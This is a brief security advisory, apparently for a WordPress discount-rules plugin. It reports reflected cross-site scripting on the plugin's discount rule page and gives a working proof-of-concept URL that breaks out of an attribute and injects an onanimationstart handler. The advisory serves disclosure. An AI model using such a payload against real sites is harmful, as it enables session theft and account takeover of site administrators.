The plugin does not escape a parameter before outputting it back in an attribute of the plugin’s discount rule page, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=woo_discount_rules&name="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//